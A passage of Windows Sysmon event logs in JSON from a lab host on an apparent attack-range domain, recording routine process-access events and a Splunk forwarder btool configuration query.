07:53:27.549","SourceProcessGUID":"{41C8662E-1F63-5F25-0000-0010C3650000}","SourceProcessId":"612","SourceThreadId":"928","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{41C8662E-1F73-5F25-0000-0010A2BC0200}","TargetProcessId":"2804","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+12343|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 07:53:27","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:53:27","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":2017,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:53:27.549\r\nSourceProcessGUID: {41C8662E-1F63-5F25-0000-0010C3650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 928\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {41C8662E-1F73-5F25-0000-0010A2BC0200}\r\nTargetProcessId: 2804\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11378|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:53:27.549","SourceProcessGUID":"{41C8662E-1F63-5F25-0000-0010C3650000}","SourceProcessId":"612","SourceThreadId":"928","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{41C8662E-1F73-5F25-0000-0010A2BC0200}","TargetProcessId":"2804","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11378|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 07:53:27","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:53:27","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":2018,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:53:27.549\r\nSourceProcessGUID: {41C8662E-1F63-5F25-0000-0010C3650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 928\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {41C8662E-1F73-5F25-0000-0010A2BC0200}\r\nTargetProcessId: 2804\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11dcd|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:53:27.549","SourceProcessGUID":"{41C8662E-1F63-5F25-0000-0010C3650000}","SourceProcessId":"612","SourceThreadId":"928","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{41C8662E-1F73-5F25-0000-0010A2BC0200}","TargetProcessId":"2804","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11dcd|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 07:53:27","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:53:27","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":2019,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:53:27.549\r\nSourceProcessGUID: {41C8662E-1F63-5F25-0000-0010C3650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 928\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {41C8662E-1F73-5F25-0000-0010A2BC0200}\r\nTargetProcessId: 2804\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+d6ce|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:53:27.549","SourceProcessGUID":"{41C8662E-1F63-5F25-0000-0010C3650000}","SourceProcessId":"612","SourceThreadId":"928","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{41C8662E-1F73-5F25-0000-0010A2BC0200}","TargetProcessId":"2804","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+d6ce|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 07:53:27","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:53:27","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":2020,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:53:27.549\r\nSourceProcessGUID: {41C8662E-1F74-5F25-0000-0010C4650300}\r\nSourceProcessId: 3884\r\nSourceThreadId: 3904\r\nSourceImage: C:\\Windows\\system32\\conhost.exe\r\nTargetProcessGUID: {41C8662E-1F77-5F25-0000-0010F5E80300}\r\nTargetProcessId: 3808\r\nTargetImage: C:\\Windows\\system32\\cmd.exe\r\nGrantedAccess: 0x1FFFFF\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\SYSTEM32\\ConhostV2.dll+5c07|C:\\Windows\\SYSTEM32\\ConhostV2.dll+76ab|C:\\Windows\\SYSTEM32\\ConhostV2.dll+a84c|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:53:27.549","SourceProcessGUID":"{41C8662E-1F74-5F25-0000-0010C4650300}","SourceProcessId":"3884","SourceThreadId":"3904","SourceImage":"C:\\Windows\\system32\\conhost.exe","TargetProcessGUID":"{41C8662E-1F77-5F25-0000-0010F5E80300}","TargetProcessId":"3808","TargetImage":"C:\\Windows\\system32\\cmd.exe","GrantedAccess":"0x1fffff","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\SYSTEM32\\ConhostV2.dll+5c07|C:\\Windows\\SYSTEM32\\ConhostV2.dll+76ab|C:\\Windows\\SYSTEM32\\ConhostV2.dll+a84c|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 07:53:27","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:53:27","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":1,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":5,"Task":1,"OpcodeValue":0,"RecordNumber":2021,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process Create:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:53:27.558\r\nProcessGuid: {41C8662E-1F77-5F25-0000-0010B1E90300}\r\nProcessId: 3240\r\nImage: C:\\Program Files\\SplunkUniversalForwarder\\bin\\btool.exe\r\nFileVersion: 8.0.2\r\nDescription: btool\r\nProduct: splunk Application\r\nCompany: Splunk Inc.\r\nOriginalFileName: btool.exe\r\nCommandLine: btool  server list replication_port --no-log\r\nCurrentDirectory: C:\\Windows\\system32\\\r\nUser: NT AUTHORITY\\SYSTEM\r\nLogonGuid: {41C8662E-1F61-5F25-0000-0020E7030000}\r\nLogonId: 0x3E7\r\nTerminalSessionId: 0\r\nIntegrityLevel: System\r\nHashes: MD5=BC53EBF68CFA6E8A254D89ABEC89A65D,SHA256=97024B4A7182D9C253B1AC4E56A1C8F3BC8808B79E6D022EF27B95003622F0A4,IMPHASH=572E0CF4672412FA940B0E1835926B3B\r\nParentProcessGuid: {41C8662E-1F77-5F25-0000-0010F5E80300}\r\nParentProcessId: 3808\r\nParentImage: C:\\Windows\\System32\\cmd.exe\r\nParentCommandLine: C:\\Windows\\system32\\cmd.exe /c btool server list replication_port --no-log","Category":"Process Create (rule: ProcessCreate)","Opcode":"Info","UtcTime":"2020-08-01 07:53:27.558","ProcessGuid":"{41C8662E-1F77-5F25-0000-0010B1E90300}","Image":"C:\\Program Files\\SplunkUniversalForwarder\\bin\\btool.exe","FileVersion":"8.0.2","Description":"btool","Product":"splunk Application","Company":"Splunk Inc.","OriginalFileName":"btool.exe","CommandLine":"btool  server list replication_port --no-log","CurrentDirectory":"C:\\Windows\\system32\\","User":"NT AUTHORITY\\SYSTEM","LogonGuid":"{41C8662E-1F61-5F25-0000-0020E7030000}","LogonId":"0x3e7","TerminalSessionId":"0","IntegrityLevel":"System","Hashes":"MD5=BC53EBF68CFA6E8A254D89ABEC89A65D,SHA256=97024B4A7182D9C253B1AC4E56A1C8F3BC8808B79E6D022EF27B95003622F0A4,IMPHASH=572E0CF4672412FA940B0E1835926B3B","ParentProcessGuid":"{41C8662E-1F77-5F25-0000-0010F5E80300}","ParentProcessId":"3808","ParentImage":"C:\\Windows\\System32\\cmd.exe","ParentCommandLine":"C:\\Windows\\system32\\cmd.exe /c btool server list replication_port --no-log","EventReceivedTime":"2020-08-01 07:53:27","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:53:27","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":2022,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:53:27.549\r\nSourceProcessGUID: {41C8662E-1F77-5F25-0000-0010F5E80300}\r\nSourceProcessId: 3808\r\nSourceThreadId: 3812\r\nSourceImage: C:\\Windows\\system32\\cmd.exe\r\nTargetProcessGUID: {41C8662E-1F77-5F25-0000-0010B1E90300}\r\nTargetProcessId: 3240\r\nTargetImage: C:\\Program Files\\SplunkUniversalForwarder\\bin\\btool.exe\r\nGrantedAccess: 0x1FFFFF\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a7194|C:\\Windows\\System32\\KERNELBASE.dll+2b860|C:\\Windows\\System32\\KERNELBASE.dll+6b246|C:\\Windows\\System32\\KERNEL32.DLL+1c213|C:\\Windows\\system32\\cmd.exe+f1e1|C:\\Windows\\system32\\cmd.exe+11a37|C:\\Windows\\system32\\cmd.exe+cb0d|C:\\Windows\\system32\\cmd.exe+c295|C:\\Windows\\system32\\cmd.exe+f916|C:\\Windows\\system32\\cmd.exe+1510d|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:53:27.549","SourceProcessGUID":"{41C8662E-1F77-5F25-0000-0010F5E80300}","SourceProcessId":"3808","SourceThreadId":"3812","SourceImage":"C:\\Windows\\system32\\cmd.exe","TargetProcessGUID":"{41C8662E-1F77-5F25-0000-0010B1E90300}","TargetProcessId":"3240","TargetImage":"C:\\Program Files\\SplunkUniversalForwarder\\bin\\btool.exe","GrantedAccess":"0x1fffff","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a7194|C:\\Windows\\System32\\KERNELBASE.dll+2b860|C:\\Windows\\System32\\KERNELBASE.dll+6b246|C:\\Windows\\System32\\KERNEL32.DLL+1c213|C:\\Windows\\system32\\cmd.exe+f1e1|C:\\Windows\\system32\\cmd.exe+11a37|C:\\Windows\\system32\\cmd.exe+cb0d|C:\\Windows\\system32\\cmd.exe+c295|C:\\Windows\\system32\\cmd.exe+f916|C:\\Windows\\system32\\cmd.exe+1510d|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 07:53:27","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:53:27","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":2023,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:53:27.549\r\nSourceProcessGUID: {41C8662E-1F61-5F25-0000-0010E7420000}\r\nSourceProcessId: 648\r\nSourceThreadId: 2336\r\nSourceImage: C:\\Windows\\system32\\csrss.exe\r\nTargetProcessGUID: {41C8662E-1F77-5F25-0000-0010B1E90300}\r\nTargetProcessId: 3240\r\nTargetImage: C:\\Program Files\\SplunkUniversalForwarder\\bin\\btool.exe\r\nGrantedAccess: 0x1FFFFF\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\basesrv.DLL+2f47|C:\\Windows\\SYSTEM32\\CSRSRV.dll+5645|C:\\Windows\\SYSTEM32\\ntdll.dll+6e87f","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:53:27.549","SourceProcessGUID":"{41C8662E-1F61-5F25-0000-0010E7420000}","SourceProcessId":"648","SourceThreadId":"2336","SourceImage":"C:\\Windows\\system32\\csrss.exe","TargetProcessGUID":"{41C8662E-1F77-5F25-0000-0010B1E90300}","TargetProcessId":"3240","TargetImage":"C:\\Program Files\\SplunkUniversalForwarder\\bin\\btool.exe","GrantedAccess":"0x1fffff","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\basesrv.DLL+2f47|C:\\Windows\\SYSTEM32\\CSRSRV.dll+5645|C:\\Windows\\SYSTEM32\\ntdll.dll+6e87f","EventReceivedTime":"2020-08-01 07:53:27","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:53:27","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":2024,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:53:27.549\r\nSourceProcessGUID: {41C8662E-1F63-5F25-0000-0010C3650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 928\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {41C8662E-1F73-5F25-0000-0010A2BC0200}\r\nTargetProcessId: 2804\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+12343|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:53:27.549","SourceProcessGUID":"{41C8662E-1F63-5F25-0000-0010C3650000}","SourceProcessId":"612","SourceThreadId":"928","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{41C8662E-1F73-5F25-0000-0010A2BC0200}","TargetProcessId":"2804","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+12343|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 07:53:27","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:53:27","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":2025,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:53:27.549\r\nSourceProcessGUID: {41C8662E-1F63-5F25-0000-0010C3650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 928\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {41C8662E-1F73-5F25-0000-0010A2BC0200}\r\nTargetProcessId: 2804\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11378|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:53:27.549","SourceProcessGUID":"{41C8662E-1F63-5F25-0000-0010C3650000}","SourceProcessId":"612","SourceThreadId":"928","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{41C8662E-1F73-5F25-0000-0010A2BC0200}","TargetProcessId":"2804","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11378|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C: